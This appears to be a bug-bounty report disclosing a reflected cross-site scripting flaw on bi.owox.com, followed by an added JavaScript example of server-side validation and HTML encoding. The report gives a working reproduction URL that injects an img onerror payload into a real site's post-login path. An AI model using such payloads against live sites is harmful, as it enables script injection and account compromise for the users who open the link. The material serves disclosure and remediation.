Hi team,
6177527534dc114eb07fa829e4ce4d28
The URL will now be: https://bi.owox.com/ui/6177527534dc114eb07fa829e4ce4d28<img src=xss onerror=prompt(‘XSS’)>/dashboard/?trial=activated
1. Go to https://bi.owox.com/ui/6177527534dc114eb07fa829e4ce4d28<img src=xss onerror=prompt(‘XSS’)>/dashboard/?trial=activated
2. Log in and XSS will execute
{F630101}
Firefox
Chrome
This vulnerability is aimed at all victims and they do not need to be involved in the Project. Just paste this URL and log in, XSS will automatically execute.
Therefore, it will have a high impact, because before XSS is executed, the application will ask the user to log in.
Impact
https://portswigger.net/web-security/cross-site-scripting/reflected
https://portswigger.net/web-security/cross-site-scripting/exploiting
Best regards,
@dat
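
One way to close this class of bug on the server side, shown as an added example that is not part of the original report or the vendor's code: validate the project ID segment of the post-login URL against a strict format and HTML-encode it wherever it is written into the page. The 32-hex-character ID format, the `/ui/<id>/...` route shape and all function names are assumptions inferred from the URL in the report.

```javascript
// Added example (hypothetical names). Assumes project IDs are exactly
// 32 lowercase hex characters, as the ID in the report suggests.
const PROJECT_ID_RE = /^[0-9a-f]{32}$/;
const BASE = 'https://bi.owox.com';

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode the five characters that can break out of HTML text or
// a quoted attribute value.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Pull the project ID out of a post-login return URL.
// Returns null for anything that is not same-origin /ui/<32 hex>/...,
// so the caller can fall back to a default landing page.
function extractProjectId(rawUrl, base = BASE) {
  let url;
  try { url = new URL(rawUrl, base); } catch { return null; }
  if (url.origin !== new URL(base).origin) return null;

  const segments = url.pathname.split('/'); // ['', 'ui', '<id>', ...]
  if (segments.length < 3 || segments[1] !== 'ui') return null;

  let id;
  try { id = decodeURIComponent(segments[2]); } catch { return null; }
  return PROJECT_ID_RE.test(id) ? id : null;
}

// Render the fragment that reflects the ID. Validation already limits
// the value to hex, but output encoding is kept as a second layer.
function renderProjectHeader(rawUrl) {
  const id = extractProjectId(rawUrl);
  if (id === null) return '<p>Unknown project</p>';
  const safe = escapeHtml(id);
  return `<h1 data-project="${safe}">Project ${safe}</h1>`;
}
```
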